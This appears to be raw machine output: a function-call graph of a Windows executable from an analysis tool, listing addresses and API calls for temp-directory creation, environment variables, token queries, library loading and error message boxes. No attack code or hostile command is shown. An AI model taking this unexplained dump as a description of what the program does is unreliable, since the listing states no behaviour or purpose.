7ff79ea43b19 14763 7ff79ea4deac 14476->14763 14480 7ff79ea43c0d 14484 7ff79ea46740 FreeLibrary 14480->14484 14483->14467 14814 7ff79ea43440 14483->14814 14484->14461 14487 7ff79ea43bfc 14808 7ff79ea46b30 14487->14808 14488 7ff79ea47a60 42 API calls 14492 7ff79ea43d0a 14488->14492 14490 7ff79ea43cb1 14494 7ff79ea46740 FreeLibrary 14490->14494 14661 7ff79ea47f80 14492->14661 14496 7ff79ea43cc5 14494->14496 14498 7ff79ea46c60 14 API calls 14496->14498 14498->14467 14506 7ff79ea55b9c 14505->14506 14507 7ff79ea55bae 14505->14507 14506->14401 17023 7ff79ea56408 14507->17023 14510 7ff79ea4c63c GetModuleHandleW 14511 7ff79ea4c64d 14510->14511 14511->14409 14513 7ff79ea4c321 14512->14513 14514 7ff79ea4c0d0 14513->14514 14515 7ff79ea4d6dc __scrt_initialize_crt 7 API calls 14513->14515 14514->14399 14515->14514 14517 7ff79ea4c4d2 _wfindfirst32i64 __scrt_get_show_window_mode 14516->14517 14518 7ff79ea4c4f1 RtlCaptureContext RtlLookupFunctionEntry 14517->14518 14519 7ff79ea4c51a RtlVirtualUnwind 14518->14519 14520 7ff79ea4c556 __scrt_get_show_window_mode 14518->14520 14519->14520 14521 7ff79ea4c588 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14520->14521 14522 7ff79ea4c5da _wfindfirst32i64 14521->14522 14522->14397 14524 7ff79ea4c19e __scrt_dllmain_crt_thread_attach 14523->14524 14524->14415 14524->14416 14526 7ff79ea4d6ee 14525->14526 14527 7ff79ea4d6e4 14525->14527 14526->14415 14531 7ff79ea4d964 14527->14531 14532 7ff79ea4d973 14531->14532 14533 7ff79ea4d6e9 14531->14533 14539 7ff79ea4db8c 14532->14539 14535 7ff79ea4d9bc 14533->14535 14536 7ff79ea4d9e7 14535->14536 14537 7ff79ea4d9eb 14536->14537 14538 7ff79ea4d9ca DeleteCriticalSection 14536->14538 14537->14526 14538->14536 14543 7ff79ea4d9f4 14539->14543 14548 7ff79ea4da38 try_get_function 14543->14548 14550 7ff79ea4db0e TlsFree 14543->14550 14544 7ff79ea4da66 LoadLibraryExW 14546 7ff79ea4dadd 14544->14546 14547 7ff79ea4da87 GetLastError 14544->14547 14545 7ff79ea4dafd GetProcAddress 14545->14550 14546->14545 14549 7ff79ea4daf4 FreeLibrary 14546->14549 14547->14548 14548->14544 14548->14545 14548->14550 14551 7ff79ea4daa9 LoadLibraryExW 14548->14551 14549->14545 14551->14546 14551->14548 14553 7ff79ea4cff0 14552->14553 14553->14420 14553->14553 14556 7ff79ea485cf 14554->14556 14555 7ff79ea485d7 14555->14424 14556->14555 14557 7ff79ea48620 WideCharToMultiByte 14556->14557 14559 7ff79ea48676 WideCharToMultiByte 14556->14559 14560 7ff79ea486c7 14556->14560 14557->14556 14557->14560 14559->14556 14559->14560 14852 7ff79ea429e0 14560->14852 14561 7ff79ea486f3 14562 7ff79ea48711 14561->14562 14564 7ff79ea50f4c __vcrt_freefls 14 API calls 14561->14564 14563 7ff79ea50f4c __vcrt_freefls 14 API calls 14562->14563 14563->14555 14564->14561 14569 7ff79ea5b62c 14565->14569 14566 7ff79ea5b6af 14888 7ff79ea5137c 14566->14888 14569->14566 14571 7ff79ea5b670 14569->14571 14881 7ff79ea5b508 14571->14881 14574 7ff79ea41eb0 14575 7ff79ea41ec5 14574->14575 14576 7ff79ea41ee0 14575->14576 14997 7ff79ea42890 14575->14997 14576->14467 14578 7ff79ea43e90 14576->14578 14579 7ff79ea4bb90 14578->14579 14580 7ff79ea43e9c GetModuleFileNameW 14579->14580 14581 7ff79ea43ecb 14580->14581 14582 7ff79ea43ee2 14580->14582 14583 7ff79ea429e0 16 API calls 14581->14583 15033 7ff79ea48af0 14582->15033 14585 7ff79ea43ede 14583->14585 14588 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14585->14588 14587 7ff79ea42b30 18 API calls 14587->14585 14589 7ff79ea43f1f 14588->14589 14589->14432 14591 7ff79ea47a6a 14590->14591 14592 7ff79ea489e0 16 API calls 14591->14592 14593 7ff79ea47a8c GetEnvironmentVariableW 14592->14593 14594 7ff79ea47af6 14593->14594 14595 7ff79ea47aa4 ExpandEnvironmentStringsW 14593->14595 14596 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14594->14596 14597 7ff79ea48af0 18 API calls 14595->14597 14598 7ff79ea47b08 14596->14598 14599 7ff79ea47acc 14597->14599 14598->14434 14599->14594 14600 7ff79ea47ad6 14599->14600 15044 7ff79ea56430 14600->15044 14603 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14604 7ff79ea47aee 14603->14604 14604->14434 14606 7ff79ea489e0 16 API calls 14605->14606 14607 7ff79ea47f57 SetEnvironmentVariableW 14606->14607 14608 7ff79ea50f4c __vcrt_freefls 14 API calls 14607->14608 14609 7ff79ea43a50 14608->14609 14610 7ff79ea41cb0 14609->14610 14612 7ff79ea41cbe 14610->14612 14611 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14613 7ff79ea41e6d 14611->14613 14615 7ff79ea41d2d 14612->14615 15060 7ff79ea41aa0 14612->15060 14613->14443 14613->14446 14615->14611 14617 7ff79ea41506 14616->14617 14620 7ff79ea4157f 14616->14620 15112 7ff79ea47850 14617->15112 14620->14445 14621 7ff79ea42b30 18 API calls 14622 7ff79ea41564 14621->14622 14622->14445 14624 7ff79ea48a87 MultiByteToWideChar 14623->14624 14625 7ff79ea48a01 MultiByteToWideChar 14623->14625 14628 7ff79ea48aaa 14624->14628 14629 7ff79ea48acf 14624->14629 14626 7ff79ea48a4c 14625->14626 14627 7ff79ea48a27 14625->14627 14626->14624 14634 7ff79ea48a62 14626->14634 14630 7ff79ea429e0 14 API calls 14627->14630 14631 7ff79ea429e0 14 API calls 14628->14631 14629->14455 14632 7ff79ea48a3a 14630->14632 14633 7ff79ea48abd 14631->14633 14632->14455 14633->14455 14635 7ff79ea429e0 14 API calls 14634->14635 14636 7ff79ea48a75 14635->14636 14636->14455 14638 7ff79ea46cf5 14637->14638 14639 7ff79ea43bc4 14638->14639 14640 7ff79ea42890 40 API calls 14638->14640 14639->14461 14775 7ff79ea46990 14639->14775 14640->14639 14647 7ff79ea43513 14641->14647 14649 7ff79ea43554 14641->14649 14642 7ff79ea43593 14644 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14642->14644 14643 7ff79ea41e80 14 API calls 14643->14649 14645 7ff79ea435a5 14644->14645 14645->14467 14650 7ff79ea47ed0 14645->14650 14647->14649 15472 7ff79ea41710 14647->15472 15514 7ff79ea42d50 14647->15514 14649->14642 14649->14643 14651 7ff79ea489e0 16 API calls 14650->14651 14652 7ff79ea47eef 14651->14652 14653 7ff79ea489e0 16 API calls 14652->14653 14654 7ff79ea47eff 14653->14654 14655 7ff79ea53a04 31 API calls 14654->14655 14656 7ff79ea47f0d 14655->14656 14657 7ff79ea50f4c __vcrt_freefls 14 API calls 14656->14657 14658 7ff79ea47f17 14657->14658 14659 7ff79ea50f4c __vcrt_freefls 14 API calls 14658->14659 14660 7ff79ea43cfe 14659->14660 14660->14488 14662 7ff79ea47f90 14661->14662 14663 7ff79ea489e0 16 API calls 14662->14663 14664 7ff79ea47fc1 SetConsoleCtrlHandler GetStartupInfoW 14663->14664 14665 7ff79ea48022 14664->14665 16075 7ff79ea564a8 14665->16075 14722 7ff79ea56830 14721->14722 14723 7ff79ea43a2f 14722->14723 14724 7ff79ea56835 RtlRestoreThreadPreferredUILanguages 14722->14724 14723->14447 14724->14723 14725 7ff79ea56850 14724->14725 14726 7ff79ea5137c _wfindfirst32i64 13 API calls 14725->14726 14726->14723 14728 7ff79ea42b50 __scrt_get_show_window_mode 14727->14728 14729 7ff79ea489e0 16 API calls 14728->14729 14730 7ff79ea42bca 14729->14730 14731 7ff79ea42c09 MessageBoxA 14730->14731 14732 7ff79ea42bcf 14730->14732 14734 7ff79ea42c23 14731->14734 14733 7ff79ea489e0 16 API calls 14732->14733 14735 7ff79ea42be9 MessageBoxW 14733->14735 14736 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14734->14736 14735->14734 14737 7ff79ea42c33 14736->14737 14737->14467 14740 7ff79ea4bbf9 14738->14740 14739 7ff79ea43ab6 14739->14510 14740->14739 14741 7ff79ea4bc50 IsProcessorFeaturePresent 14740->14741 14742 7ff79ea4bc68 14741->14742 16135 7ff79ea4be44 RtlCaptureContext 14742->16135 14748 7ff79ea43fac 14747->14748 14749 7ff79ea489e0 16 API calls 14748->14749 14750 7ff79ea43fd7 14749->14750 14751 7ff79ea489e0 16 API calls 14750->14751 14752 7ff79ea43fea 14751->14752 16140 7ff79ea52398 14752->16140 14755 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14756 7ff79ea43ade 14755->14756 14756->14466 14757 7ff79ea481b0 14756->14757 14761 7ff79ea481d4 14757->14761 14758 7ff79ea482ab 14759 7ff79ea50f4c __vcrt_freefls 14 API calls 14758->14759 14760 7ff79ea43b14 14759->14760 14760->14443 14760->14476 14761->14758 14762 7ff79ea4e1c8 _fread_nolock 46 API calls 14761->14762 14762->14761 14764 7ff79ea4dec3 14763->14764 14765 7ff79ea4dee1 14763->14765 14766 7ff79ea5137c _wfindfirst32i64 13 API calls 14764->14766 14773 7ff79ea4ded3 14765->14773 16581 7ff79ea512ac EnterCriticalSection 14765->16581 14767 7ff79ea4dec8 14766->14767 14769 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 14767->14769 14769->14773 14773->14466 14776 7ff79ea469ca 14775->14776 14777 7ff79ea469b3 14775->14777 14776->14469 14777->14776 16582 7ff79ea415a0 14777->16582 14779 7ff79ea469d4 14779->14776 14780 7ff79ea46b0f 14779->14780 14782 7ff79ea46aa5 memcpy_s 14779->14782 14781 7ff79ea42b30 18 API calls 14780->14781 14781->14776 14783 7ff79ea50f4c __vcrt_freefls 14 API calls 14782->14783 14784 7ff79ea46afd 14783->14784 14784->14469 14790 7ff79ea464fa memcpy_s 14785->14790 14787 7ff79ea4660f 14791 7ff79ea50f4c __vcrt_freefls 14 API calls 14787->14791 14788 7ff79ea46646 14789 7ff79ea42b30 18 API calls 14788->14789 14789->14787 14790->14787 14790->14788 14790->14790 14795 7ff79ea41710 127 API calls 14790->14795 14796 7ff79ea4662c 14790->14796 16606 7ff79ea41950 14790->16606 14792 7ff79ea46707 14791->14792 14793 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14792->14793 14794 7ff79ea43bea 14793->14794 14794->14480 14798 7ff79ea46460 14794->14798 14795->14790 14797 7ff79ea42b30 18 API calls 14796->14797 14797->14787 16610 7ff79ea48160 14798->16610 14801 7ff79ea48160 31 API calls 14802 7ff79ea4648f 14801->14802 14803 7ff79ea464c5 14802->14803 14805 7ff79ea464a7 14802->14805 14804 7ff79ea42b30 18 API calls 14803->14804 14806 7ff79ea43bf8 14804->14806 16615 7ff79ea46df0 GetProcAddress 14805->16615 14806->14480 14806->14487 14809 7ff79ea46b54 14808->14809 14810 7ff79ea42b30 18 API calls 14809->14810 14813 7ff79ea46bca 14809->14813 14811 7ff79ea46bae 14810->14811 14812 7ff79ea46740 FreeLibrary 14811->14812 14812->14813 14813->14468 16674 7ff79ea45ab0 14814->16674 14817 7ff79ea4348d 14817->14490 14821 7ff79ea43470 14821->14817 16749 7ff79ea45980 14821->16749 14867 7ff79ea4bb90 14852->14867 14855 7ff79ea42a29 14869 7ff79ea48460 14855->14869 14857 7ff79ea42a60 __scrt_get_show_window_mode 14858 7ff79ea489e0 13 API calls 14857->14858 14859 7ff79ea42ab5 14858->14859 14860 7ff79ea42aba 14859->14860 14861 7ff79ea42af4 MessageBoxA 14859->14861 14862 7ff79ea489e0 13 API calls 14860->14862 14863 7ff79ea42b0e 14861->14863 14864 7ff79ea42ad4 MessageBoxW 14862->14864 14865 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14863->14865 14864->14863 14866 7ff79ea42b1e 14865->14866 14866->14561 14868 7ff79ea429fc GetLastError 14867->14868 14868->14855 14870 7ff79ea4846c 14869->14870 14871 7ff79ea4848d FormatMessageW 14870->14871 14872 7ff79ea48487 GetLastError 14870->14872 14873 7ff79ea484dc WideCharToMultiByte 14871->14873 14874 7ff79ea484c0 14871->14874 14872->14871 14876 7ff79ea48516 14873->14876 14878 7ff79ea484d3 14873->14878 14875 7ff79ea429e0 13 API calls 14874->14875 14875->14878 14877 7ff79ea429e0 13 API calls 14876->14877 14877->14878 14879 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14878->14879 14880 7ff79ea48545 14879->14880 14880->14857 14894 7ff79ea512ac EnterCriticalSection 14881->14894 14895 7ff79ea597ac GetLastError 14888->14895 14890 7ff79ea51385 14891 7ff79ea567c8 14890->14891 14977 7ff79ea56718 14891->14977 14896 7ff79ea597ce 14895->14896 14897 7ff79ea597d3 14895->14897 14918 7ff79ea5aaf0 14896->14918 14901 7ff79ea597db SetLastError 14897->14901 14922 7ff79ea5ab38 14897->14922 14901->14890 14905 7ff79ea59827 14908 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14905->14908 14906 7ff79ea59817 14907 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14906->14907 14909 7ff79ea5981e 14907->14909 14910 7ff79ea5982f 14908->14910 14934 7ff79ea56830 14909->14934 14911 7ff79ea59833 14910->14911 14912 7ff79ea59845 14910->14912 14915 7ff79ea5ab38 _invalid_parameter_noinfo 6 API calls 14911->14915 14939 7ff79ea593d4 14912->14939 14915->14909 14944 7ff79ea5a720 14918->14944 14923 7ff79ea5a720 try_get_function 5 API calls 14922->14923 14924 7ff79ea5ab66 14923->14924 14925 7ff79ea5ab78 TlsSetValue 14924->14925 14926 7ff79ea597f6 14924->14926 14925->14926 14926->14901 14927 7ff79ea5a6a8 14926->14927 14932 7ff79ea5a6b9 _invalid_parameter_noinfo 14927->14932 14928 7ff79ea5a70a 14930 7ff79ea5137c _wfindfirst32i64 12 API calls 14928->14930 14929 7ff79ea5a6ee RtlAllocateHeap 14931 7ff79ea59809 14929->14931 14929->14932 14930->14931 14931->14905 14931->14906 14932->14928 14932->14929 14954 7ff79ea5ef50 14932->14954 14935 7ff79ea56867 14934->14935 14936 7ff79ea56835 RtlRestoreThreadPreferredUILanguages 14934->14936 14935->14901 14936->14935 14937 7ff79ea56850 14936->14937 14938 7ff79ea5137c _wfindfirst32i64 12 API calls 14937->14938 14938->14935 14963 7ff79ea592ac 14939->14963 14945 7ff79ea5a781 TlsGetValue 14944->14945 14952 7ff79ea5a77c try_get_function 14944->14952 14946 7ff79ea5a864 14946->14945 14948 7ff79ea5a872 GetProcAddress 14946->14948 14947 7ff79ea5a7b0 LoadLibraryW 14949 7ff79ea5a7d1 GetLastError 14947->14949 14947->14952 14950 7ff79ea5a883 14948->14950 14949->14952 14950->14945 14951 7ff79ea5a849 FreeLibrary 14951->14952 14952->14945 14952->14946 14952->14947 14952->14951 14953 7ff79ea5a80b LoadLibraryExW 14952->14953 14953->14952 14957 7ff79ea5ef80 14954->14957 14962 7ff79ea5c1c8 EnterCriticalSection 14957->14962 14975 7ff79ea5c1c8 EnterCriticalSection 14963->14975 14978 7ff79ea597ac _invalid_parameter_noinfo 13 API calls 14977->14978 14979 7ff79ea5673d 14978->14979 14981 7ff79ea4399b 14979->14981 14985 7ff79ea567e8 IsProcessorFeaturePresent 14979->14985 14981->14574 14986 7ff79ea567fb 14985->14986 14989 7ff79ea565b4 14986->14989 14990 7ff79ea565ee _wfindfirst32i64 __scrt_get_show_window_mode 14989->14990 14991 7ff79ea56616 RtlCaptureContext RtlLookupFunctionEntry 14990->14991 14992 7ff79ea56686 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14991->14992 14993 7ff79ea56650 RtlVirtualUnwind 14991->14993 14994 7ff79ea566d8 _wfindfirst32i64 14992->14994 14993->14992 14995 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 14994->14995 14996 7ff79ea566f7 GetCurrentProcess TerminateProcess 14995->14996 14998 7ff79ea428ac 14997->14998 14999 7ff79ea5137c _wfindfirst32i64 13 API calls 14998->14999 15000 7ff79ea42904 14999->15000 15012 7ff79ea5139c 15000->15012 15002 7ff79ea4290b __scrt_get_show_window_mode 15003 7ff79ea489e0 16 API calls 15002->15003 15004 7ff79ea42960 15003->15004 15005 7ff79ea4299f MessageBoxA 15004->15005 15006 7ff79ea42965 15004->15006 15007 7ff79ea429b9 15005->15007 15008 7ff79ea489e0 16 API calls 15006->15008 15009 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15007->15009 15010 7ff79ea4297f MessageBoxW 15008->15010 15011 7ff79ea429c9 15009->15011 15010->15007 15011->14576 15013 7ff79ea597ac _invalid_parameter_noinfo 13 API calls 15012->15013 15014 7ff79ea513ae 15013->15014 15015 7ff79ea513b6 15014->15015 15016 7ff79ea5a6a8 _invalid_parameter_noinfo 13 API calls 15014->15016 15019 7ff79ea513e9 15014->15019 15015->15002 15017 7ff79ea513de 15016->15017 15018 7ff79ea56830 Concurrency::details::SchedulerProxy::DeleteThis 13 API calls 15017->15018 15018->15019 15019->15015 15024 7ff79ea5ae68 15019->15024 15022 7ff79ea567e8 _wfindfirst32i64 17 API calls 15023 7ff79ea51477 15022->15023 15029 7ff79ea5ae80 15024->15029 15025 7ff79ea5ae85 15026 7ff79ea51455 15025->15026 15027 7ff79ea5137c _wfindfirst32i64 13 API calls 15025->15027 15026->15015 15026->15022 15028 7ff79ea5ae8f 15027->15028 15030 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15028->15030 15029->15025 15029->15026 15031 7ff79ea5aeca 15029->15031 15030->15026 15031->15026 15032 7ff79ea5137c _wfindfirst32i64 13 API calls 15031->15032 15032->15028 15034 7ff79ea48b14 WideCharToMultiByte 15033->15034 15035 7ff79ea48b82 WideCharToMultiByte 15033->15035 15036 7ff79ea48b3e 15034->15036 15037 7ff79ea48b55 15034->15037 15038 7ff79ea43ef5 15035->15038 15039 7ff79ea48baf 15035->15039 15040 7ff79ea429e0 16 API calls 15036->15040 15037->15035 15042 7ff79ea48b6b 15037->15042 15038->14585 15038->14587 15041 7ff79ea429e0 16 API calls 15039->15041 15040->15038 15041->15038 15043 7ff79ea429e0 16 API calls 15042->15043 15043->15038 15045 7ff79ea56447 15044->15045 15048 7ff79ea47ade 15044->15048 15045->15048 15051 7ff79ea564d0 15045->15051 15048->14603 15049 7ff79ea567e8 _wfindfirst32i64 17 API calls 15050 7ff79ea564a4 15049->15050 15052 7ff79ea564dd 15051->15052 15053 7ff79ea564e7 15051->15053 15052->15053 15057 7ff79ea56502 15052->15057 15054 7ff79ea5137c _wfindfirst32i64 13 API calls 15053->15054 15059 7ff79ea564ee 15054->15059 15055 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15056 7ff79ea56474 15055->15056 15056->15048 15056->15049 15057->15056 15058 7ff79ea5137c _wfindfirst32i64 13 API calls 15057->15058 15058->15059 15059->15055 15061 7ff79ea43fa0 98 API calls 15060->15061 15062 7ff79ea41ad6 15061->15062 15063 7ff79ea481b0 47 API calls 15062->15063 15068 7ff79ea41c84 15062->15068 15065 7ff79ea41b0e 15063->15065 15064 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15066 7ff79ea41c98 15064->15066 15069 7ff79ea41b2c 15065->15069 15070 7ff79ea41b44 15065->15070 15087 7ff79ea41b3f 15065->15087 15066->14615 15067 7ff79ea4deac 64 API calls 15067->15068 15068->15064 15071 7ff79ea42890 40 API calls 15069->15071 15089 7ff79ea4e1c8 15070->15089 15071->15087 15074 7ff79ea41b5f 15075 7ff79ea42890 40 API calls 15074->15075 15075->15087 15076 7ff79ea41b77 15077 7ff79ea41bee 15076->15077 15078 7ff79ea41bd6 15076->15078 15080 7ff79ea4e1c8 _fread_nolock 46 API calls 15077->15080 15079 7ff79ea42890 40 API calls 15078->15079 15079->15087 15081 7ff79ea41c03 15080->15081 15082 7ff79ea41c09 15081->15082 15083 7ff79ea41c1e 15081->15083 15084 7ff79ea42890 40 API calls 15082->15084 15092 7ff79ea4df3c 15083->15092 15084->15087 15087->15067 15088 7ff79ea42b30 18 API calls 15088->15087 15098 7ff79ea4e1e8 15089->15098 15093 7ff79ea4df45 15092->15093 15097 7ff79ea41c32 15092->15097 15094 7ff79ea5137c _wfindfirst32i64 13 API calls 15093->15094 15095 7ff79ea4df4a 15094->15095 15096 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15095->15096 15096->15097 15097->15087 15097->15088 15099 7ff79ea41b59 15098->15099 15100 7ff79ea4e212 15098->15100 15099->15074 15099->15076 15100->15099 15101 7ff79ea4e25e 15100->15101 15102 7ff79ea4e221 __scrt_get_show_window_mode 15100->15102 15111 7ff79ea512ac EnterCriticalSection 15101->15111 15104 7ff79ea5137c _wfindfirst32i64 13 API calls 15102->15104 15106 7ff79ea4e236 15104->15106 15109 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15106->15109 15109->15099 15113 7ff79ea47866 15112->15113 15114 7ff79ea4788a 15113->15114 15115 7ff79ea478dd GetTempPathW 15113->15115 15116 7ff79ea47a60 42 API calls 15114->15116 15128 7ff79ea478f2 15115->15128 15117 7ff79ea47896 15116->15117 15188 7ff79ea47320 15117->15188 15122 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15124 7ff79ea4154f 15122->15124 15124->14620 15124->14621 15126 7ff79ea50f4c __vcrt_freefls 14 API calls 15127 7ff79ea478c6 15126->15127 15127->15115 15130 7ff79ea478ca 15127->15130 15129 7ff79ea479b6 15128->15129 15133 7ff79ea50f4c __vcrt_freefls 14 API calls 15128->15133 15137 7ff79ea47941 15128->15137 15167 7ff79ea54684 15128->15167 15170 7ff79ea48850 15128->15170 15132 7ff79ea48af0 18 API calls 15129->15132 15131 7ff79ea42b30 18 API calls 15130->15131 15134 7ff79ea478d6 15131->15134 15135 7ff79ea479c7 15132->15135 15133->15128 15166 7ff79ea47992 15134->15166 15136 7ff79ea50f4c __vcrt_freefls 14 API calls 15135->15136 15138 7ff79ea479cf 15136->15138 15139 7ff79ea489e0 16 API calls 15137->15139 15137->15166 15141 7ff79ea489e0 16 API calls 15138->15141 15138->15166 15140 7ff79ea47957 15139->15140 15142 7ff79ea47999 SetEnvironmentVariableW 15140->15142 15143 7ff79ea4795c 15140->15143 15144 7ff79ea479e5 15141->15144 15148 7ff79ea50f4c __vcrt_freefls 14 API calls 15142->15148 15145 7ff79ea489e0 16 API calls 15143->15145 15146 7ff79ea479ea 15144->15146 15147 7ff79ea47a1d SetEnvironmentVariableW 15144->15147 15150 7ff79ea4796c 15145->15150 15151 7ff79ea489e0 16 API calls 15146->15151 15149 7ff79ea47a18 15147->15149 15148->15166 15152 7ff79ea50f4c __vcrt_freefls 14 API calls 15149->15152 15153 7ff79ea53a04 31 API calls 15150->15153 15154 7ff79ea479fa 15151->15154 15152->15166 15155 7ff79ea4797a 15153->15155 15156 7ff79ea53a04 31 API calls 15154->15156 15157 7ff79ea50f4c __vcrt_freefls 14 API calls 15155->15157 15158 7ff79ea47a08 15156->15158 15159 7ff79ea47982 15157->15159 15160 7ff79ea50f4c __vcrt_freefls 14 API calls 15158->15160 15161 7ff79ea50f4c __vcrt_freefls 14 API calls 15159->15161 15162 7ff79ea47a10 15160->15162 15164 7ff79ea4798a 15161->15164 15163 7ff79ea50f4c __vcrt_freefls 14 API calls 15162->15163 15163->15149 15165 7ff79ea50f4c __vcrt_freefls 14 API calls 15164->15165 15165->15166 15166->15122 15223 7ff79ea542e8 15167->15223 15171 7ff79ea4bb90 15170->15171 15172 7ff79ea48860 GetCurrentProcess OpenProcessToken 15171->15172 15173 7ff79ea488ab GetTokenInformation 15172->15173 15174 7ff79ea48921 15172->15174 15175 7ff79ea488cd GetLastError 15173->15175 15176 7ff79ea488d8 15173->15176 15177 7ff79ea50f4c __vcrt_freefls 14 API calls 15174->15177 15175->15174 15175->15176 15176->15174 15181 7ff79ea488ee GetTokenInformation 15176->15181 15178 7ff79ea48929 15177->15178 15179 7ff79ea4893a 15178->15179 15180 7ff79ea48934 FindCloseChangeNotification 15178->15180 15183 7ff79ea48963 LocalFree ConvertStringSecurityDescriptorToSecurityDescriptorW 15179->15183 15180->15179 15181->15174 15182 7ff79ea48914 ConvertSidToStringSidW 15181->15182 15182->15174 15184 7ff79ea489a8 15183->15184 15185 7ff79ea48996 CreateDirectoryW 15183->15185 15186 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15184->15186 15185->15184 15187 7ff79ea489c1 15186->15187 15187->15128 15189 7ff79ea4732c 15188->15189 15190 7ff79ea489e0 16 API calls 15189->15190 15191 7ff79ea4734e 15190->15191 15192 7ff79ea47369 ExpandEnvironmentStringsW 15191->15192 15193 7ff79ea47356 15191->15193 15195 7ff79ea50f4c __vcrt_freefls 14 API calls 15192->15195 15194 7ff79ea42b30 18 API calls 15193->15194 15196 7ff79ea47362 15194->15196 15197 7ff79ea4738f 15195->15197 15201 7ff79ea4bbf0 _wfindfirst32i64 8 API calls 15196->15201 15198 7ff79ea473a6 15197->15198 15199 7ff79ea47393 15197->15199 15203 7ff79ea473c0 15198->15203 15204 7ff79ea473b4 15198->15204 15200 7ff79ea42b30 18 API calls 15199->15200 15200->15196 15202 7ff79ea47488 15201->15202 15202->15166 15213 7ff79ea53a04 15202->15213 15354 7ff79ea52218 15203->15354 15347 7ff79ea535b4 15204->15347 15207 7ff79ea473be 15208 7ff79ea473da 15207->15208 15211 7ff79ea473ed __scrt_get_show_window_mode 15207->15211 15209 7ff79ea42b30 18 API calls 15208->15209 15209->15196 15210 7ff79ea47462 CreateDirectoryW 15210->15196 15211->15210 15212 7ff79ea4743c CreateDirectoryW 15211->15212 15212->15211 15214 7ff79ea53a24 15213->15214 15215 7ff79ea53a11 15213->15215 15464 7ff79ea53680 15214->15464 15216 7ff79ea5137c _wfindfirst32i64 13 API calls 15215->15216 15218 7ff79ea53a16 15216->15218 15219 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15218->15219 15221 7ff79ea478bc 15219->15221 15221->15126 15266 7ff79ea5d04c 15223->15266 15316 7ff79ea5cdc8 15266->15316 15337 7ff79ea5c1c8 EnterCriticalSection 15316->15337 15348 7ff79ea535d2 15347->15348 15351 7ff79ea53605 15347->15351 15348->15351 15368 7ff79ea5c364 15348->15368 15351->15207 15352 7ff79ea567e8 _wfindfirst32i64 17 API calls 15353 7ff79ea53635 15352->15353 15355 7ff79ea52237 15354->15355 15356 7ff79ea522a0 15354->15356 15355->15356 15357 7ff79ea5223c 15355->15357 15404 7ff79ea5b9d0 15356->15404 15359 7ff79ea5226c 15357->15359 15360 7ff79ea5224f 15357->15360 15385 7ff79ea5204c GetFullPathNameW 15359->15385 15377 7ff79ea51fd8 GetFullPathNameW 15360->15377 15365 7ff79ea52264 15365->15207 15366 7ff79ea5228a 15366->15365 15367 7ff79ea50f4c __vcrt_freefls 14 API calls 15366->15367 15367->15365 15369 7ff79ea5c37b 15368->15369 15370 7ff79ea5c371 15368->15370 15371 7ff79ea5137c _wfindfirst32i64 13 API calls 15369->15371 15370->15369 15373 7ff79ea5c397 15370->15373 15376 7ff79ea5c383 15371->15376 15372 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15374 7ff79ea53601 15372->15374 15373->15374 15375 7ff79ea5137c _wfindfirst32i64 13 API calls 15373->15375 15374->15351 15374->15352 15375->15376 15376->15372 15378 7ff79ea51ffe GetLastError 15377->15378 15379 7ff79ea52014 15377->15379 15380 7ff79ea5130c _fread_nolock 13 API calls 15378->15380 15383 7ff79ea5137c _wfindfirst32i64 13 API calls 15379->15383 15384 7ff79ea52010 15379->15384 15381 7ff79ea5200b 15380->15381 15382 7ff79ea5137c _wfindfirst32i64 13 API calls 15381->15382 15382->15384 15383->15384 15384->15365 15386 7ff79ea52099 15385->15386 15387 7ff79ea52083 GetLastError 15385->15387 15389 7ff79ea520b7 15386->15389 15391 7ff79ea50f4c __vcrt_freefls 14 API calls 15386->15391 15394 7ff79ea52095 15386->15394 15388 7ff79ea5130c _fread_nolock 13 API calls 15387->15388 15390 7ff79ea52090 15388->15390 15393 7ff79ea520f0 GetFullPathNameW 15389->15393 15389->15394 15392 7ff79ea5137c _wfindfirst32i64 13 API calls 15390->15392 15391->15389 15392->15394 15393->15387 15393->15394 15395 7ff79ea52130 15394->15395 15396 7ff79ea521a9 memcpy_s 15395->15396 15397 7ff79ea52159 __scrt_get_show_window_mode 15395->15397 15396->15366 15397->15396 15398 7ff79ea52192 15397->15398 15401 7ff79ea521cb 15397->15401 15399 7ff79ea5137c _wfindfirst32i64 13 API calls 15398->15399 15400 7ff79ea52197 15399->15400 15402 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15400->15402 15401->15396 15403 7ff79ea5137c _wfindfirst32i64 13 API calls 15401->15403 15402->15396 15403->15400 15407 7ff79ea5b7e8 15404->15407 15408 7ff79ea5b83d 15407->15408 15409 7ff79ea5b814 15407->15409 15411 7ff79ea5b862 15408->15411 15412 7ff79ea5b841 15408->15412 15410 7ff79ea5137c _wfindfirst32i64 13 API calls 15409->15410 15425 7ff79ea5b819 15410->15425 15450 7ff79ea5af3c 15411->15450 15438 7ff79ea5b950 15412->15438 15416 7ff79ea5b84a 15418 7ff79ea5135c _fread_nolock 13 API calls 15416->15418 15417 7ff79ea567c8 _invalid_parameter_noinfo 30 API calls 15436 7ff79ea5b824 15417->15436 15419 7ff79ea5b84f 15418->15419 15421 7ff79ea5137c _wfindfirst32i64 13 API calls 15419->15421 15420 7ff79ea5b867 15423 7ff79ea5b90b 15420->15423 15428 7ff79ea5b88f 15420->15428 15421->15425 